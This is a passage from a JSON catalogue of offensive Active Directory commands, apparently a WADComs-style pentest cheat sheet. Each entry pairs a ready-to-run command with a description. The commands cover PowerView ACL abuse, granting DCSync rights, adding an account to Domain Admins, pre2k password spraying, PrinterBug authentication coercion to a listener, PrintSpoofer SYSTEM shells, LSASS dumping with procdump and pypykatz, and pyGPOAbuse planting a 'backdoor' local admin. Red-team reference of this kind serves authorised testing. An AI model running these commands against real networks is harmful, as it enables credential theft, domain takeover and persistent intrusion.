   3350     ],
   3351     "references": [
   3352       "https://github.com/NetSPI/PowerUpSQL",
   3353       "https://www.netspi.com/blog/technical-blog/network-penetration-testing/finding-sensitive-data-domain-sql-servers-powerupsql/",
   3354       "https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server"
   3355     ],
   3356     "added": true
   3357   },
   3358   {
   3359     "id": "wadcoms:PowerUpSQL-Invoke-SQLAudit",
   3360     "toolId": "wadcoms:PowerUpSQL",
   3361     "toolName": "PowerUpSQL",
   3362     "name": "PowerUpSQL-Invoke-SQLAudit",
   3363     "source": "DAEMON",
   3364     "platform": [
   3365       "Windows",
   3366       "ActiveDirectory"
   3367     ],
   3368     "capability": [
   3369       "Privilege Escalation",
   3370       "Execution"
   3371     ],
   3372     "nativeCategory": [
   3373       "PrivEsc",
   3374       "Exploitation"
   3375     ],
   3376     "command": "Import-Module .\\PowerUpSQL.ps1\n\n# Audit an instance for privesc issues\nInvoke-SQLAudit -Verbose -Instance 10.10.10.1\n\n# Execute an OS command through the instance\nInvoke-SQLOSCmd -Verbose -Instance 10.10.10.1 -Command \"whoami\"",
   3377     "description": "Invoke-SQLAudit runs PowerUpSQL's battery of privilege-escalation checks against an instance and reports exploitable misconfigurations (impersonation, trustworthy databases, agent jobs, etc.). Where the login already has the rights, Invoke-SQLOSCmd executes an operating-system command through the instance (using xp_cmdshell), returning output. Both take -Instance in HOST\\INSTANCE or HOST,PORT form and use integrated auth by default.\n\nCommand Reference:\n\n\tTarget instance: 10.10.10.1",
   3378     "mitre": [],
   3379     "requires": [
   3380       "PowerShell"
   3381     ],
   3382     "services": [
   3383       "MSSQL"
   3384     ],
   3385     "references": [
   3386       "https://github.com/NetSPI/PowerUpSQL",
   3387       "https://www.netspi.com/blog/technical-blog/network-penetration-testing/establishing-registry-persistence-via-sql-server-powerupsql/",
   3388       "https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server"
   3389     ],
   3390     "added": true
   3391   },
   3392   {
   3393     "id": "wadcoms:PowerView-AddDomainGroupMember-DA",
   3394     "toolId": "wadcoms:PowerView",
   3395     "toolName": "PowerView",
   3396     "name": "PowerView-AddDomainGroupMember-DA",
   3397     "source": "DAEMON",
   3398     "platform": [
   3399       "Windows",
   3400       "ActiveDirectory"
   3401     ],
   3402     "capability": [
   3403       "Privilege Escalation",
   3404       "Persistence"
   3405     ],
   3406     "nativeCategory": [
   3407       "PrivEsc",
   3408       "Persistence"
   3409     ],
   3410     "command": "Import-Module .\\PowerView.ps1\nAdd-DomainGroupMember -Identity 'Domain Admins' -Members john -Verbose\n# Verify\nGet-DomainGroupMember -Identity 'Domain Admins' | select MemberName",
   3411     "description": "Add-DomainGroupMember adds a principal to a group over LDAP, and when you hold write access to the membership of a privileged group (for example via an abusable GenericAll/WriteMembers ACE) this promotes a controlled account straight into Domain Admins. This is a loud, high-impact change that should be reverted with Remove-DomainGroupMember after the objective; it is often paired with -Credential to act as the principal that actually holds the right.\n\nCommand Reference:\n\n\tUsername: john\n\n\tTarget group: Domain Admins",
   3412     "mitre": [],
   3413     "requires": [
   3414       "PowerShell"
   3415     ],
   3416     "services": [
   3417       "LDAP"
   3418     ],
   3419     "references": [
   3420       "https://github.com/PowerShellMafia/PowerSploit",
   3421       "https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993",
   3422       "https://www.thehacker.recipes/ad/movement/dacl/"
   3423     ],
   3424     "added": true
   3425   },
   3426   {
   3427     "id": "wadcoms:PowerView-AddDomainObjectAcl-DCSync",
   3428     "toolId": "wadcoms:PowerView",
   3429     "toolName": "PowerView",
   3430     "name": "PowerView-AddDomainObjectAcl-DCSync",
   3431     "source": "DAEMON",
   3432     "platform": [
   3433       "Windows",
   3434       "ActiveDirectory"
   3435     ],
   3436     "capability": [
   3437       "Persistence",
   3438       "Credential Access",
   3439       "Privilege Escalation"
   3440     ],
   3441     "nativeCategory": [
   3442       "Persistence",
   3443       "Credential Access",
   3444       "PrivEsc"
   3445     ],
   3446     "command": "Import-Module .\\PowerView.ps1\n# Grant john DCSync replication rights on the domain object\nAdd-DomainObjectAcl -TargetIdentity 'DC=test,DC=local' -PrincipalIdentity john -Rights DCSync -Verbose",
   3447     "description": "Add-DomainObjectAcl grants an ACE on a target object to a principal you control. Targeting the domain head with -Rights DCSync adds the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights, letting your account replicate secrets (a DCSync attack) without being a Domain Admin. This requires that your current context can already write the domain object's DACL (e.g. WriteDacl on the domain), and it is a durable backdoor that should be cleaned up with Remove-DomainObjectAcl.\n\nCommand Reference:\n\n\tPrincipal granted rights: john\n\n\tDomain: test.local",
   3448     "mitre": [],
   3449     "requires": [
   3450       "PowerShell"
   3451     ],
   3452     "services": [
   3453       "LDAP"
   3454     ],
   3455     "references": [
   3456       "https://github.com/PowerShellMafia/PowerSploit",
   3457       "https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993",
   3458       "https://www.thehacker.recipes/ad/movement/dacl/grant-rights.html"
   3459     ],
   3460     "added": true
   3461   },
   3462   {
   3463     "id": "wadcoms:PowerView-ASREPRoastable",
   3464     "toolId": "wadcoms:PowerView",
   3465     "toolName": "PowerView",
   3466     "name": "PowerView-ASREPRoastable",
   3467     "source": "DAEMON",
   3468     "platform": [
   3469       "Windows",
   3470       "ActiveDirectory"
   3471     ],
   3472     "capability": [
   3473       "Enumeration",
   3474       "Discovery"
   3475     ],
   3476     "nativeCategory": [
   3477       "Enumeration",
   3478       "Discovery"
   3479     ],
   3480     "command": "Import-Module .\\PowerView.ps1\nGet-DomainUser -PreauthNotRequired -Properties samaccountname,useraccountcontrol -Verbose",
   3481     "description": "Get-DomainUser -PreauthNotRequired finds accounts with the DONT_REQ_PREAUTH flag (userAccountControl bit 0x400000), which are AS-REP roastable because a DC will return an encrypted AS-REP without prior authentication. Use it to identify targets whose AS-REP hash you can then crack offline. This is an LDAP read only; the actual roast is performed with a separate tool such as Rubeus or GetNPUsers.\n\nCommand Reference:\n\n\tDomain: test.local",
   3482     "mitre": [],
   3483     "requires": [
   3484       "PowerShell"
   3485     ],
   3486     "services": [
   3487       "LDAP",
   3488       "Kerberos"
   3489     ],
   3490     "references": [
   3491       "https://github.com/PowerShellMafia/PowerSploit",
   3492       "https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993",
   3493       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/asreproast"
   3494     ],
   3495     "added": true
   3496   },
   3497   {
   3498     "id": "wadcoms:PowerView-DomainTrust",
   3499     "toolId": "wadcoms:PowerView",
   3500     "toolName": "PowerView",
   3501     "name": "PowerView-DomainTrust",
   3502     "source": "DAEMON",
   3503     "platform": [
   3504       "Windows",
   3505       "ActiveDirectory"
   3506     ],
   3507     "capability": [
   3508       "Enumeration",
   3509       "Discovery"
   3510     ],
   3511     "nativeCategory": [
   3512       "Enumeration",
   3513       "Discovery"
   3514     ],
   3515     "command": "Import-Module .\\PowerView.ps1\n# Trusts of the current domain\nGet-DomainTrust\n# Forest / inter-forest trusts\nGet-ForestTrust\n# Recursively map every reachable trust\nGet-DomainTrustMapping",
   3516     "description": "Get-DomainTrust enumerates the trust relationships of the current (or a specified) domain, while Get-ForestTrust returns forest-level (inter-forest) trusts. Reading trust direction, transitivity, and SID-filtering state is the first step in planning cross-domain and cross-forest attacks such as foreign group membership abuse or trust-key based ticket forging. Get-DomainTrustMapping walks reachable domains recursively to build the full trust graph.\n\nCommand Reference:\n\n\tDomain: test.local",
   3517     "mitre": [],
   3518     "requires": [
   3519       "PowerShell"
   3520     ],
   3521     "services": [
   3522       "LDAP"
   3523     ],
   3524     "references": [
   3525       "https://github.com/PowerShellMafia/PowerSploit",
   3526       "https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993",
   3527       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"
   3528     ],
   3529     "added": true
   3530   },
   3531   {
   3532     "id": "wadcoms:PowerView-FindLocalAdminAccess",
   3533     "toolId": "wadcoms:PowerView",
   3534     "toolName": "PowerView",
   3535     "name": "PowerView-FindLocalAdminAccess",
   3536     "source": "DAEMON",
   3537     "platform": [
   3538       "Windows",
   3539       "ActiveDirectory"
   3540     ],
   3541     "capability": [
   3542       "Discovery",
   3543       "Lateral Movement"
   3544     ],
   3545     "nativeCategory": [
   3546       "Discovery",
   3547       "Lateral Movement"
   3548     ],
   3549     "command": "Import-Module .\\PowerView.ps1\nFind-LocalAdminAccess -Verbose | Out-File output.txt",
   3550     "description": "Find-LocalAdminAccess queries the domain for all computers and then, using the OpenServiceControlManager check, tests each one to see whether the current user context has local administrator access. It is the fastest way to discover where your foothold account can already move laterally without cracking anything. The SCM probes generate authentication traffic to many hosts, so it is not stealthy on a monitored network.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tOutput file: output.txt",
   3551     "mitre": [],
   3552     "requires": [
   3553       "PowerShell"
   3554     ],
   3555     "services": [
   3556       "SMB"
   3557     ],
   3558     "references": [
   3559       "https://github.com/PowerShellMafia/PowerSploit",
   3560       "https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993",
   3561       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"
   3562     ],
   3563     "added": true
   3564   },
   3565   {
   3566     "id": "wadcoms:PowerView-GetDomainObjectAcl",
   3567     "toolId": "wadcoms:PowerView",
   3568     "toolName": "PowerView",
   3569     "name": "PowerView-GetDomainObjectAcl",
   3570     "source": "DAEMON",
   3571     "platform": [
   3572       "Windows",
   3573       "ActiveDirectory"
   3574     ],
   3575     "capability": [
   3576       "Discovery",
   3577       "Privilege Escalation"
   3578     ],
   3579     "nativeCategory": [
   3580       "Discovery",
   3581       "PrivEsc"
   3582     ],
   3583     "command": "Import-Module .\\PowerView.ps1\nGet-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs |\n  ? { $_.ActiveDirectoryRights -match 'WriteDacl|WriteOwner|GenericAll|GenericWrite' }",
   3584     "description": "Get-DomainObjectAcl returns the raw DACL for a single object so you can confirm exactly which principals hold which rights over a specific user, group, computer, or the domain head. Pair -Identity with -ResolveGUIDs to expand extended rights such as DS-Replication-Get-Changes (DCSync) or User-Force-Change-Password. This is the targeted follow-up to Find-InterestingDomainAcl when you already know the object you want to attack.\n\nCommand Reference:\n\n\tTarget object: Domain Admins\n\n\tDomain: test.local",
   3585     "mitre": [],
   3586     "requires": [
   3587       "PowerShell"
   3588     ],
   3589     "services": [
   3590       "LDAP"
   3591     ],
   3592     "references": [
   3593       "https://github.com/PowerShellMafia/PowerSploit",
   3594       "https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993",
   3595       "https://www.thehacker.recipes/ad/movement/dacl/"
   3596     ],
   3597     "added": true
   3598   },
   3599   {
   3600     "id": "wadcoms:PowerView-GPOLocalGroup",
   3601     "toolId": "wadcoms:PowerView",
   3602     "toolName": "PowerView",
   3603     "name": "PowerView-GPOLocalGroup",
   3604     "source": "DAEMON",
   3605     "platform": [
   3606       "Windows",
   3607       "ActiveDirectory"
   3608     ],
   3609     "capability": [
   3610       "Enumeration",
   3611       "Discovery"
   3612     ],
   3613     "nativeCategory": [
   3614       "Enumeration",
   3615       "Discovery"
   3616     ],
   3617     "command": "Import-Module .\\PowerView.ps1\n# All GPOs in the domain\nGet-DomainGPO -Properties displayname,name\n# GPOs that modify local group membership\nGet-DomainGPOLocalGroup\n# Where does 'john' become a local Administrator via GPO?\nGet-DomainGPOUserLocalGroupMapping -Identity john -LocalGroup Administrators",
   3618     "description": "Get-DomainGPO enumerates every Group Policy Object in the domain, and Get-DomainGPOLocalGroup parses GPOs that use Restricted Groups or Group Policy Preferences to set local group membership (for example local Administrators). Get-DomainGPOUserLocalGroupMapping then resolves which machines a given user or group ends up as local admin on through those GPOs. Together they map the GPO-to-local-admin relationships needed for lateral movement and for finding GPOs worth abusing.\n\nCommand Reference:\n\n\tUsername: john\n\n\tDomain: test.local",
   3619     "mitre": [],
   3620     "requires": [
   3621       "PowerShell"
   3622     ],
   3623     "services": [
   3624       "LDAP"
   3625     ],
   3626     "references": [
   3627       "https://github.com/PowerShellMafia/PowerSploit",
   3628       "https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e",
   3629       "https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993"
   3630     ],
   3631     "added": true
   3632   },
   3633   {
   3634     "id": "wadcoms:PowerView-InterestingDomainAcl",
   3635     "toolId": "wadcoms:PowerView",
   3636     "toolName": "PowerView",
   3637     "name": "PowerView-InterestingDomainAcl",
   3638     "source": "DAEMON",
   3639     "platform": [
   3640       "Windows",
   3641       "ActiveDirectory"
   3642     ],
   3643     "capability": [
   3644       "Discovery",
   3645       "Privilege Escalation"
   3646     ],
   3647     "nativeCategory": [
   3648       "Discovery",
   3649       "PrivEsc"
   3650     ],
   3651     "command": "Import-Module .\\PowerView.ps1\nFind-InterestingDomainAcl -ResolveGUIDs |\n  ? { $_.IdentityReferenceName -eq 'john' } |\n  select ObjectDN, ActiveDirectoryRights, IdentityReferenceName",
   3652     "description": "Find-InterestingDomainAcl surfaces ACEs across the domain that grant modification rights (GenericAll, GenericWrite, WriteDacl, WriteOwner, ResetPassword, etc.) to non-built-in principals, which are the ACL-based privilege escalation paths. The -ResolveGUIDs switch translates extended-right and property-set object GUIDs into human-readable names so DCSync and ForceChangePassword rights are legible. Filtering the output to your controlled principals quickly reveals abusable edges.\n\nCommand Reference:\n\n\tUsername: john",
   3653     "mitre": [],
   3654     "requires": [
   3655       "PowerShell"
   3656     ],
   3657     "services": [
   3658       "LDAP"
   3659     ],
   3660     "references": [
   3661       "https://github.com/PowerShellMafia/PowerSploit",
   3662       "https://www.thehacker.recipes/ad/movement/dacl/",
   3663       "https://wald0.com/?p=112"
   3664     ],
   3665     "added": true
   3666   },
   3667   {
   3668     "id": "wadcoms:PowerView-InvokeUserHunter",
   3669     "toolId": "wadcoms:PowerView",
   3670     "toolName": "PowerView",
   3671     "name": "PowerView-InvokeUserHunter",
   3672     "source": "DAEMON",
   3673     "platform": [
   3674       "Windows",
   3675       "ActiveDirectory"
   3676     ],
   3677     "capability": [
   3678       "Discovery",
   3679       "Lateral Movement"
   3680     ],
   3681     "nativeCategory": [
   3682       "Discovery",
   3683       "Lateral Movement"
   3684     ],
   3685     "command": "Import-Module .\\PowerView.ps1\n# Hunt for any Domain Admin session, flag where we already have admin\nInvoke-UserHunter -GroupName 'Domain Admins' -CheckAccess\n# Quieter variant: only query likely session hosts\nInvoke-UserHunter -GroupName 'Domain Admins' -Stealth",
   3686     "description": "Invoke-UserHunter finds machines where a target user (or members of a target group such as Domain Admins) is logged in or has an active session, by combining Get-NetSession, Get-NetLoggedon, and Get-NetComputer across the domain. Adding -CheckAccess also reports whether you already have local admin on the hosts where the target is present, marking immediate credential-theft opportunities. Use -Stealth to only query high-value session hosts (DCs, file servers) and reduce noise.\n\nCommand Reference:\n\n\tTarget group: Domain Admins",
   3687     "mitre": [],
   3688     "requires": [
   3689       "PowerShell"
   3690     ],
   3691     "services": [
   3692       "SMB"
   3693     ],
   3694     "references": [
   3695       "https://github.com/PowerShellMafia/PowerSploit",
   3696       "https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993",
   3697       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"
   3698     ],
   3699     "added": true
   3700   },
   3701   {
   3702     "id": "wadcoms:PowerView-Kerberoastable-SPN",
   3703     "toolId": "wadcoms:PowerView",
   3704     "toolName": "PowerView",
   3705     "name": "PowerView-Kerberoastable-SPN",
   3706     "source": "DAEMON",
   3707     "platform": [
   3708       "Windows",
   3709       "ActiveDirectory"
   3710     ],
   3711     "capability": [
   3712       "Enumeration",
   3713       "Discovery"
   3714     ],
   3715     "nativeCategory": [
   3716       "Enumeration",
   3717       "Discovery"
   3718     ],
   3719     "command": "# Import PowerView into the current session first\nImport-Module .\\PowerView.ps1\n# List every account with an SPN (kerberoastable)\nGet-DomainUser -SPN -Properties samaccountname,serviceprincipalname | Out-File output.txt",
   3720     "description": "PowerView's Get-DomainUser -SPN enumerates domain user accounts that have a servicePrincipalName set, which are the candidates for Kerberoasting. Run it from an existing domain-joined foothold shell to build a target list before requesting service tickets. It only queries LDAP and does not request any TGS, so it is quiet on its own; the noisy step is the later roast.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tOutput file: output.txt",
   3721     "mitre": [],
   3722     "requires": [
   3723       "PowerShell"
   3724     ],
   3725     "services": [
   3726       "LDAP",
   3727       "Kerberos"
   3728     ],
   3729     "references": [
   3730       "https://github.com/PowerShellMafia/PowerSploit",
   3731       "https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993",
   3732       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/kerberoast"
   3733     ],
   3734     "added": true
   3735   },
   3736   {
   3737     "id": "wadcoms:PowerView-SetDomainObjectOwner",
   3738     "toolId": "wadcoms:PowerView",
   3739     "toolName": "PowerView",
   3740     "name": "PowerView-SetDomainObjectOwner",
   3741     "source": "DAEMON",
   3742     "platform": [
   3743       "Windows",
   3744       "ActiveDirectory"
   3745     ],
   3746     "capability": [
   3747       "Privilege Escalation",
   3748       "Persistence"
   3749     ],
   3750     "nativeCategory": [
   3751       "PrivEsc",
   3752       "Persistence"
   3753     ],
   3754     "command": "Import-Module .\\PowerView.ps1\n# Take ownership of the target, then we can rewrite its DACL\nSet-DomainObjectOwner -Identity 'Domain Admins' -OwnerIdentity john -Verbose\nAdd-DomainObjectAcl -TargetIdentity 'Domain Admins' -PrincipalIdentity john -Rights All",
   3755     "description": "Set-DomainObjectOwner changes the owner of an AD object to a principal you control. When you hold WriteOwner over a target, taking ownership lets you then write its DACL (via Add-DomainObjectAcl) and grant yourself full control, chaining a limited ACE into complete object takeover. This is the classic first step of a WriteOwner-to-GenericAll escalation against a privileged group or user.\n\nCommand Reference:\n\n\tNew owner: john\n\n\tTarget object: Domain Admins",
   3756     "mitre": [],
   3757     "requires": [
   3758       "PowerShell"
   3759     ],
   3760     "services": [
   3761       "LDAP"
   3762     ],
   3763     "references": [
   3764       "https://github.com/PowerShellMafia/PowerSploit",
   3765       "https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993",
   3766       "https://www.thehacker.recipes/ad/movement/dacl/"
   3767     ],
   3768     "added": true
   3769   },
   3770   {
   3771     "id": "wadcoms:pre2k-Auth",
   3772     "toolId": "wadcoms:pre2k",
   3773     "toolName": "pre2k",
   3774     "name": "pre2k Authenticated Enumeration",
   3775     "source": "DAEMON",
   3776     "platform": [
   3777       "Linux",
   3778       "ActiveDirectory",
   3779       "Windows"
   3780     ],
   3781     "capability": [
   3782       "Discovery",
   3783       "Credential Access"
   3784     ],
   3785     "nativeCategory": [
   3786       "Discovery",
   3787       "Credential Access"
   3788     ],
   3789     "command": "pre2k auth -d test.local -u john -p password123 -dc-ip 10.10.10.1 -save",
   3790     "description": "In auth mode pre2k uses valid domain credentials to query LDAP for computer objects whose userAccountControl still flags them as pre-created (pwdLastSet == 0 / never logged on) and sprays the lowercase-name password against each. This finds pre-Windows 2000 accounts that are still active and abusable directly from an existing foothold, avoiding blind guessing. Add -targeted to focus on accounts with no lastlogontimestamp and -save to grab a TGT for each hit.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tDC IP: 10.10.10.1",
   3791     "mitre": [],
   3792     "requires": [
   3793       "Username",
   3794       "Password"
   3795     ],
   3796     "services": [
   3797       "LDAP",
   3798       "Kerberos"
   3799     ],
   3800     "references": [
   3801       "https://github.com/garrettfoster13/pre2k",
   3802       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"
   3803     ],
   3804     "added": true
   3805   },
   3806   {
   3807     "id": "wadcoms:pre2k-Unauth",
   3808     "toolId": "wadcoms:pre2k",
   3809     "toolName": "pre2k",
   3810     "name": "pre2k Unauthenticated Spray",
   3811     "source": "DAEMON",
   3812     "platform": [
   3813       "Linux",
   3814       "ActiveDirectory",
   3815       "Windows"
   3816     ],
   3817     "capability": [
   3818       "Credential Access",
   3819       "Discovery"
   3820     ],
   3821     "nativeCategory": [
   3822       "Credential Access",
   3823       "Discovery"
   3824     ],
   3825     "command": "pre2k unauth -d test.local -dc-ip 10.10.10.1 -inputfile output.txt -save",
   3826     "description": "pre2k (Garrett Foster) abuses pre-Windows 2000 pre-created computer accounts, whose password is the lowercase of the sAMAccountName without the trailing dollar sign (e.g. account WORKSTATION01$ has password 'workstation01'). In unauth mode it takes a list of candidate machine names (recovered from a null LDAP/RPC bind or enumeration) and Kerberos pre-auth sprays them, requiring no domain credentials. Use -save to request and store a TGT (.ccache) for any account that authenticates, giving an initial foothold.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tDC IP: 10.10.10.1\n\n\tInput file: output.txt",
   3827     "mitre": [],
   3828     "requires": [
   3829       "No_Creds"
   3830     ],
   3831     "services": [
   3832       "Kerberos",
   3833       "LDAP"
   3834     ],
   3835     "references": [
   3836       "https://github.com/garrettfoster13/pre2k",
   3837       "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology"
   3838     ],
   3839     "added": true
   3840   },
   3841   {
   3842     "id": "wadcoms:PrinterBug-printerbug",
   3843     "toolId": "wadcoms:PrinterBug",
   3844     "toolName": "PrinterBug",
   3845     "name": "PrinterBug-printerbug",
   3846     "source": "DAEMON",
   3847     "platform": [
   3848       "Linux",
   3849       "ActiveDirectory",
   3850       "Windows"
   3851     ],
   3852     "capability": [
   3853       "Execution"
   3854     ],
   3855     "nativeCategory": [
   3856       "Exploitation"
   3857     ],
   3858     "command": "python3 printerbug.py test.local/john:password123@10.10.10.1 10.10.10.2",
   3859     "description": "printerbug.py (shipped with dirkjanm's krbrelayx toolkit) abuses the MS-RPRN Print System Remote Protocol (the SpoolSample / PrinterBug technique) by calling RpcRemoteFindFirstPrinterChangeNotificationEx on the target's spooler service, forcing the target machine account to authenticate back to an attacker-controlled host over SMB or HTTP. The captured machine-account authentication is then relayed with ntlmrelayx or krbrelayx (e.g. for RBCD or ADCS abuse). The target is given as a domain/user:password@target connection string followed by the attacker host. Requires a valid domain account and a running Print Spooler on the target.\n\nCommand Reference:\n\n\tTarget IP: 10.10.10.1\n\n\tListener IP: 10.10.10.2\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123",
   3860     "mitre": [],
   3861     "requires": [
   3862       "Username",
   3863       "Password"
   3864     ],
   3865     "services": [
   3866       "RPC",
   3867       "NTLM"
   3868     ],
   3869     "references": [
   3870       "https://github.com/dirkjanm/krbrelayx",
   3871       "https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-rprn"
   3872     ],
   3873     "added": true
   3874   },
   3875   {
   3876     "id": "wadcoms:PrintSpoofer-SeImpersonate",
   3877     "toolId": "wadcoms:PrintSpoofer",
   3878     "toolName": "PrintSpoofer",
   3879     "name": "PrintSpoofer-SeImpersonate",
   3880     "source": "DAEMON",
   3881     "platform": [
   3882       "Windows",
   3883       "ActiveDirectory"
   3884     ],
   3885     "capability": [
   3886       "Privilege Escalation",
   3887       "Execution"
   3888     ],
   3889     "nativeCategory": [
   3890       "PrivEsc",
   3891       "Exploitation"
   3892     ],
   3893     "command": "# Spawn an interactive SYSTEM shell in the current console\nPrintSpoofer64.exe -i -c cmd\n\n# Or run a single payload as SYSTEM (non-interactive)\nPrintSpoofer64.exe -c \"C:\\Windows\\System32\\cmd.exe /c whoami > C:\\output.txt\"",
   3894     "description": "PrintSpoofer abuses SeImpersonatePrivilege held by service accounts (IIS AppPool, MSSQL, etc.) to escalate to SYSTEM. It coerces the local Print Spooler service to authenticate to an attacker-controlled named pipe (\\\\pipe\\\\spoolss) via MS-RPRN, captures the SYSTEM token with ImpersonateNamedPipeClient, and uses CreateProcessAsUser/WithTokenW to spawn a process. Use it when you land as a low-privileged service account whose token shows SeImpersonatePrivilege enabled; it works on Windows 10 / Server 2016-2019 where JuicyPotato's DCOM path was patched. Requires the Print Spooler service running and the SeImpersonate (or SeAssignPrimaryToken) privilege.\n\nCommand Reference:\n\n\tPrivilege required: SeImpersonatePrivilege",
   3895     "mitre": [],
   3896     "requires": [
   3897       "Shell"
   3898     ],
   3899     "services": [
   3900       "RPC"
   3901     ],
   3902     "references": [
   3903       "https://github.com/itm4n/PrintSpoofer",
   3904       "https://itm4n.github.io/printspoofer-abusing-impersonation-privileges/",
   3905       "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer"
   3906     ],
   3907     "added": true
   3908   },
   3909   {
   3910     "id": "wadcoms:Procdump-LSASS",
   3911     "toolId": "wadcoms:Procdump",
   3912     "toolName": "Procdump",
   3913     "name": "Procdump-LSASS",
   3914     "source": "DAEMON",
   3915     "platform": [
   3916       "Windows",
   3917       "ActiveDirectory"
   3918     ],
   3919     "capability": [
   3920       "Credential Access"
   3921     ],
   3922     "nativeCategory": [
   3923       "Credential Access"
   3924     ],
   3925     "command": "procdump.exe -accepteula -ma lsass.exe C:\\Windows\\Temp\\lsass.dmp",
   3926     "description": "Procdump is a signed Microsoft Sysinternals utility, so it often survives application allowlisting and looks benign on disk while still producing a full LSASS memory dump. The -ma flag writes a complete dump (all memory) of lsass.exe and -accepteula suppresses the license prompt for non-interactive use. It needs administrator rights with SeDebugPrivilege; copy the .dmp off-host and extract credentials with pypykatz or Mimikatz sekurlsa::minidump.\n\nCommand Reference:\n\n\tOutput dump: C:\\Windows\\Temp\\lsass.dmp",
   3927     "mitre": [
   3928       "T1003.001"
   3929     ],
   3930     "requires": [
   3931       "Shell"
   3932     ],
   3933     "services": [
   3934       "NTLM",
   3935       "Kerberos"
   3936     ],
   3937     "references": [
   3938       "https://learn.microsoft.com/en-us/sysinternals/downloads/procdump",
   3939       "https://book.hacktricks.xyz/windows-hardening/stealing-credentials",
   3940       "https://attack.mitre.org/techniques/T1003/001/"
   3941     ],
   3942     "added": true
   3943   },
   3944   {
   3945     "id": "wadcoms:pyGPOAbuse-ScheduledTask",
   3946     "toolId": "wadcoms:pyGPOAbuse",
   3947     "toolName": "pyGPOAbuse",
   3948     "name": "pyGPOAbuse-ScheduledTask",
   3949     "source": "DAEMON",
   3950     "platform": [
   3951       "Linux",
   3952       "ActiveDirectory",
   3953       "Windows"
   3954     ],
   3955     "capability": [
   3956       "Privilege Escalation",
   3957       "Lateral Movement",
   3958       "Execution"
   3959     ],
   3960     "nativeCategory": [
   3961       "PrivEsc",
   3962       "Lateral Movement",
   3963       "Exploitation"
   3964     ],
   3965     "command": "# With a password: add a local admin user via an immediate scheduled task\npython3 pygpoabuse.py test.local/john:password123 -gpo-id \"12345677-ABCD-9876-ABCD-123456789012\" \\\n  -dc-ip 10.10.10.1 \\\n  -taskname \"SecurityUpdate\" \\\n  -command 'net user backdoor P@ssw0rd /add && net localgroup Administrators backdoor /add'\n\n# Pass-the-hash variant\npython3 pygpoabuse.py test.local/john -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7 -gpo-id \"12345677-ABCD-9876-ABCD-123456789012\" -dc-ip 10.10.10.1",
   3966     "description": "pyGPOAbuse is a partial Linux/Python implementation of SharpGPOAbuse that abuses write access to a GPO by adding an immediate scheduled task to its Machine (or User) preferences, executing an arbitrary command as SYSTEM on hosts in scope at the next policy refresh. You authenticate with a password or NT hash and target the GPO by its GUID (-gpo-id), which you can obtain from PowerView's Get-DomainGPO or ldapsearch. It is ideal when operating from a Linux box with no Windows tooling; use --cleanup afterwards to remove the planted task.\n\nCommand Reference:\n\n\tDomain: test.local\n\n\tUsername: john\n\n\tPassword: password123\n\n\tNT hash: 2a3de7fe356ee524cc9f3d579f2e0aa7\n\n\tDC IP: 10.10.10.1",
   3967     "mitre": [
   3968       "T1484.001"
   3969     ],
   3970     "requires": [
   3971       "Username",
   3972       "Password",
   3973       "Hash"
   3974     ],
   3975     "services": [
   3976       "LDAP",
   3977       "SMB"
   3978     ],
   3979     "references": [
   3980       "https://github.com/Hackndo/pyGPOAbuse",
   3981       "https://posts.specterops.io/a-red-teamers-guide-to-gpos-and-ous-f0d03976a31e",
   3982       "https://attack.mitre.org/techniques/T1484/001/"
   3983     ],
   3984     "added": true
   3985   },
   3986   {
   3987     "id": "wadcoms:Pypykatz-Minidump",
   3988     "toolId": "wadcoms:Pypykatz",
   3989     "toolName": "Pypykatz",
   3990     "name": "Pypykatz-Minidump",
   3991     "source": "DAEMON",
   3992     "platform": [
   3993       "Linux",
   3994       "ActiveDirectory",
   3995       "Windows"
   3996     ],
   3997     "capability": [
   3998       "Credential Access"
   3999     ],
   4000     "nativeCategory": [
   4001       "Credential Access"
   4002     ],
   4003     "command": "pypykatz lsa minidump lsass.dmp -o output.txt",
   4004     "description": "Pypykatz is a pure-Python reimplementation of Mimikatz's sekurlsa module that parses an LSASS minidump entirely offline, so credentials can be extracted on the operator's Linux box without running Mimikatz on the target. Feed it any dump produced by nanodump, comsvcs.dll MiniDump, or procdump to recover NT hashes, Kerberos keys, and cached plaintexts. This keeps the noisy parsing off the victim host and out of reach of host EDR.\n\nCommand Reference:\n\n\tInput dump: lsass.dmp\n\n\tOutput file: output.txt",
   4005     "mitre": [
   4006       "T1003.001"
   4007     ],
   4008     "requires": [
   4009       "Shell"
   4010     ],
   4011     "services": [
   4012       "NTLM",
   4013       "Kerberos"
   4014     ],
   4015     "references": [
   4016       "https://github.com/skelsec/pypykatz",
   4017       "https://book.hacktricks.xyz/windows-hardening/stealing-credentials",
   4018       "https://attack.mitre.org/techniques/T1003/001/"
   4019     ],
   4020     "added": true
   4021   },
   4022   {
